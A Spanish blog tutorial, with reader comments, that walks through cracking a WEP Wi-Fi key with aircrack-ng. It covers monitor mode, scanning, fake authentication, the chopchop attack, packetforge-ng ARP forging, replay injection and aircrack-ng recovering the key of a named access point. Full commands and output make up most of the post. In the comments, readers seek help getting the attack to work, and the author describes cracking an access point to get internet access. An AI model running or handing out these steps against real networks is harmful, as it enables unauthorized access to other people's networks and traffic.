Ataque 4: Ataque chopchop + Ataque 2 : Interactive Packet Replay
Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin necesidad de conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sà misma, sino que revela únicamente el texto plano. De cualquier modo, algunos puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Si el punto de acceso tira paquetes menores de 42 bytes, aireplay intenta adivinar el resto de los datos, tan pronto como el encabezado (headers) sea predecible. Si un paquete IP es capturado, automáticamente comprueba el checksum del encabezado para ver si es correcto, y despues trata de adivinar las partes que le faltan. Este ataque requiere como mÃnimo un paquete de datos WEP.
Modo Monitor con Airmon-ng
Nuestro primer paso sera poner nuestro dispositivo inalambrico en modo Monitor. El modo monitor es un modo especial que se usa para capturar paquetes wireles 802.11. Para esto iniciamos el script airmon-ng tal como se muestra a continuación.
Modo Monitor con Airmon-ng
Nuestro primer paso sera poner nuestro dispositivo inalambrico en modo Monitor. El modo monitor es un modo especial que se usa para capturar paquetes wireles 802.11. Para esto iniciamos el script airmon-ng tal como se muestra a continuación.
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1232 dhclient3
2118 dhclient3
Process with PID 2082 (ifup) is running on interface wlan0
Process with PID 2118 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy1]
(monitor mode enabled on mon0)
root@bt:~#
Ahora lanzamos airodump-ng para escanear las redes que están a nuestro alcance y asi poder elegir una red en especifico.
root@bt:~# airodump-ng mon0
CH 2 ][ Elapsed: 8 s ][ 2011-06-07 12:39
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:3F:18:85:C9 -127 4 2 0 6 54 . WEP WEP 2WIRE974
BSSID STATION PWR Rate Lost Packets Probes
00:18:3F:18:85:C9 0C:60:76:71:D5:5B -127 0 -54 0 1
root@bt:~#
Elegimos la red objetivo y lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB (mon0) en el canal (6) donde esta trasmitiendo el punto de acceso (00:18:3F:18:85:C9).
root@bt:~# airodump-ng -c 6 -w captura --bssid 00:18:3F:18:85:C9 mon0
Con el parámetro --bssid indicamos la dirección MAC del punto de acceso, -c indicamos el numero de canal y el parámetro -w ponemos el nombre del archivo donde se guardaran los datos.
CH 6 ][ Elapsed: 1 min ][ 2011-06-07 12:55 ][ Decloak: 00:18:3F:18:85:C9
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:3F:18:85:C9 -127 93 909 241 2 6 54 . WEP WEP OPN 2WIRE974
BSSID STATION PWR Rate Lost Packets Probes
00:18:3F:18:85:C9 00:C0:CA:4A:82:97 0 0 - 1 0 9638
Ataque 1: Falsa Autenticación
Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.
root@bt:~# aireplay-ng -1 0 -e 2WIRE974 -a 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 mon0
12:54:37 Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
12:54:37 Sending Authentication Request (Open System) [ACK]
12:54:38 Authentication successful
12:54:38 Sending Association Request [ACK]
12:54:38 Association successful :-) (AID: 1)
Ataque 4: Ataque Chopchop
Una vez autenticado correctamente lanzamos el ataque chopchop con el siguiente comando. El -4 significa que realizaremos el ataque chopchop, -b la dirección MAC del punto de acceso, -h la dirección MAC de nuestro dispositivo inalambrico y el mon0 es tal como es reconocido nuestro dispositivo.
root@bt:~# aireplay-ng -4 -b 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 mon0
12:54:48 Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:18:3F:18:85:C9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:18:3F:18:85:C9
0x0000: 0842 3a01 ffff ffff ffff 0018 3f18 85c9 .B:.........?...
0x0010: 0018 3f18 85c9 d06e 3f5d 5c00 0695 56a5 ..?....n?]\...V.
0x0020: 05bb c1d0 3adf e8c9 d3db da6a 5fc0 a283 ....:......j_...
0x0030: e901 d215 c1a4 5a7a efc0 ea3f 255f 0c69 ......Zz...?%_.i
0x0040: a4d8 6b51 ..kQ
Use this packet ? y
Saving chosen packet in replay_src-0607-125448.cap
Offset 67 ( 0% done) | xor = 03 | pt = 52 | 234 frames written in 3993ms
Offset 66 ( 2% done) | xor = 81 | pt = EA | 167 frames written in 2833ms
Offset 65 ( 5% done) | xor = 6F | pt = B7 | 85 frames written in 1446ms
Offset 64 ( 8% done) | xor = 10 | pt = B4 | 197 frames written in 3348ms
Offset 63 (11% done) | xor = 2A | pt = 43 | 171 frames written in 2901ms
Offset 62 (14% done) | xor = 0D | pt = 01 | 126 frames written in 2148ms
Offset 61 (17% done) | xor = F7 | pt = A8 | 212 frames written in 3609ms
Offset 60 (20% done) | xor = E5 | pt = C0 | 216 frames written in 3670ms
Offset 59 (23% done) | xor = C0 | pt = FF | 186 frames written in 3156ms
Offset 58 (26% done) | xor = 15 | pt = FF | 59 frames written in 1008ms
Offset 57 (29% done) | xor = 3F | pt = FF | 43 frames written in 731ms
Offset 56 (32% done) | xor = 10 | pt = FF | 91 frames written in 1545ms
Offset 55 (35% done) | xor = 85 | pt = FF | 73 frames written in 1248ms
Offset 54 (38% done) | xor = A5 | pt = FF | 29 frames written in 487ms
Offset 53 (41% done) | xor = 5A | pt = FE | 214 frames written in 3629ms
Offset 52 (44% done) | xor = C0 | pt = 01 | 43 frames written in 742ms
Offset 51 (47% done) | xor = BD | pt = A8 | 137 frames written in 2322ms
Offset 50 (50% done) | xor = 12 | pt = C0 | 35 frames written in 606ms
Offset 49 (52% done) | xor = C8 | pt = C9 | 223 frames written in 3783ms
Offset 48 (55% done) | xor = 6C | pt = 85 | 47 frames written in 801ms
Offset 47 (58% done) | xor = 9B | pt = 18 | 64 frames written in 1087ms
Offset 46 (61% done) | xor = 9D | pt = 3F | 252 frames written in 4287ms
Offset 45 (64% done) | xor = D8 | pt = 18 | 108 frames written in 1836ms
Offset 44 (67% done) | xor = 5F | pt = 00 | 241 frames written in 4099ms
Offset 43 (70% done) | xor = 6B | pt = 01 | 193 frames written in 3282ms
Offset 42 (73% done) | xor = DA | pt = 00 | 98 frames written in 1660ms
Offset 41 (76% done) | xor = DF | pt = 04 | 163 frames written in 2773ms
Offset 40 (79% done) | xor = D5 | pt = 06 | 68 frames written in 1157ms
Sent 1000 packets, current guess: E4...
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0607-125543.cap
Saving keystream in replay_dec-0607-125543.xor
Completed in 40s (0.75 bytes/s)
Como se puede observar, tuvimos exito con el ataque chopchop. El archivo llamado keystream in replay_dec-0607-125543.xor lo utilizaremos para generar un paquete ARP con el famoso packetforge-ng. Nuestro objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
root@bt:~# packetforge-ng -0 -a 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0607-125543.xor -w ARP
Wrote packet to: ARP
Ataque 2: Interactive Packet ReplayInyección del paquete ARP con areplay-ng.
root@bt:~# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:4A:82:97)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:18:3F:18:85:C9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:C0:CA:4A:82:97
0x0000: 0841 0201 0018 3f18 85c9 00c0 ca4a 8297 .A....?......J..
0x0010: ffff ffff ffff 8001 3f5d 5c00 0695 56a5 ........?]\...V.
0x0020: 05bb c1d0 3adf e8c9 d3db da6a 5f18 57d1 ....:......j_.W.
0x0030: ee5f ed42 3fa5 a585 103f 15c0 1a08 f2d5 ._.B?....?......
0x0040: 3f8a 5f41 ?._A
Use this packet ? y
Saving chosen packet in replay_src-0607-125633.cap
You should also start airodump-ng to capture replies.
Sent 16265 packets... (500pps)
Por ultimo lanzamos aircrack-ng para obtener la clave WEP.root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 98407 packets.
# BSSID ESSID Encryption
1 00:18:3F:18:85:C9 2WIRE974 WEP (21485 IVs)
Choosing first network as target.
Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21572 ivs.
Aircrack-ng 1.1 r1904
[00:00:05] Tested 866 keys (got 20515 IVs)
KB depth byte(vote)
0 11/ 13 C0(25600) 76(25344) 8B(25344) A6(25344) F6(24832) 12(24576) 73(24576)
1 0/ 3 02(31232) 19(27904) EB(26880) 6E(26624) 8E(26624) 70(26368) 09(26112)
2 0/ 4 95(31232) F2(29184) 59(26880) 14(26880) 6E(26112) 03(25856) 75(25856)
3 0/ 6 92(30464) 92(28160) E5(27904) 3D(26368) C3(26112) D5(26112) 92(25344)
4 0/ 1 80(34048) 06(28416) 9F(26880) 76(26624) 8A(26624) F1(26624) FB(26624)
KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%
Referencias: Hacking Exposed Wireless, Second Edition
Ataque 4: Ataque chopchop
8 comentarios
ya no se donde escribirte y te escrito por todos lados y e bajado todo lo que dices en tu web pero yo creo que tu no estas actuando bien se ve que eres estudiado pero yo creo que estudiastes para enganar a la gente y muy bien y si tienes tiempo respondeme yo soy dj carlangas
ResponderEliminarBuenas djcarlangas.
ResponderEliminarPuedes revisar de nuevo los post, ya te he contestado.
Tal como lo mencione en otros posts, no te molestes, te vallas enfermar, elige la paz, aveces no tengo tiempo para contestar. Pero tarde o temprano es seguro :)
Tal como lo dige, tu problema puede ser por varias razon, puede que no lo estas aciendo bien, que el punto de acceso este muy lejos y que no llegue muy bien la señal, que el punto de acceso no sea vulnerable y otras razones, puedes probar otra alternativa al ataque de fragmentacion, en este post se explica como hacerlo, el ataque 4 o bien conocido por el chopchop http://delfirosales.blogspot.com/2011/06/ataque-4-ataque-chopchop-attack-2.html
Puedes probar este, Desasociando a un cliente conectado al punto de acceso y asi obtener la clave http://delfirosales.blogspot.com/2011/04/video-cracking-wep-desasociando-un.html
o utilizando el Ataque 1: Autenticación Falsa + el
Ataque 3: Reinyección de una petición ARP (ARP-request) http://delfirosales.blogspot.com/2011/03/video-inyeccion-con-alfa-2000mw-en.html
y seguro que obtines la clave :)
saludos!!
Tambien puede ser porque tu tarjeta inalambrica no soporte el ataque de fragmentacion o chopchop.
ResponderEliminargracias por contestar delfi
ResponderEliminarprimero que todo la senal me agara completamente la senal es mas tengo una entena que agara 7 cajas con senal completa que la tengo conectada con un caja de alfa y la antana es de alargo alcanse y es tabien de la compania de alfa yo no creo que sea la senal de la antena y en segundo cuando yo te escribi por el problema era que se quedaba leyendo los (PACKETS) por cierto un dia deje la compu un dia completo leyendo los packets y no pasaba de ahi y lo intente con el (-5) para framentar y tambien con el chopchop (-4) y de ahi no pasa solo se queda leyendo y es por eso que te insisto que contestes por que ya intente de todas maneras y nada y por lo que veo yo no soy el unico y si vas hacer un titurial hazlo bien espicificado. gracias
De mi experiencia que he tenido haciendo auditorias a varios APs, me he topado con algunos en que no aceptan ningún tipo de ataque y no se porque, puede que los APs estén parcheados y sean mas nuevos por lo cual están protegidos con este tipo de ataques. Una cosa curiosa que me paso hace como 2 o 3 meses cuando realice un ataque a un AP que de igual manera como lo mencionas tu, la señal era excelente, pero a la hora del ataque con mi alfa, asocio correctamente, pero a la hora de realizar el ataque chopchop o fragmenteacion nada mas no pasaba de ahi, probe de muchas maneras, tarde tiempo intentandole de varias maneras y al final lo deje asi, no pude sacar la clave. Pasando varios dias intente de nuevo y la misma historia, no logre sacar la clave. Despues de otros dias volvi a internet y mi sorpresa que todo a la primera funciono todo bien y logre sacar la clave, sin duda que no me pude explicarme porque en los dias anteriores no pude obtener la clave y lo hacia todo bien pero ese dia fue a la primera.
ResponderEliminarEs lo que puedo comentarte.
He estado leyendo el articulo y me parece bastante claro y muy bien documentado, pero me ha surgido una duda. En este caso me da la impresion que es necesario para llevarlo a cabo que una station este conectada previamente al AP
ResponderEliminar¿es asi o no es necesaria la station?
Muchas gracias
@Anónimo
ResponderEliminarHola, no es necesario que previamente una station este conectado al AP. Este ataque es efectivo cuando haya o no haya clientes conectado al AP.
Bueno amigo pero es necesario tener la mac de un equipo de la red porque yo intento con mi mac original y se queda cargando Send xxxx packets y no se no consigo y despues me de asocia el AP
ResponderEliminar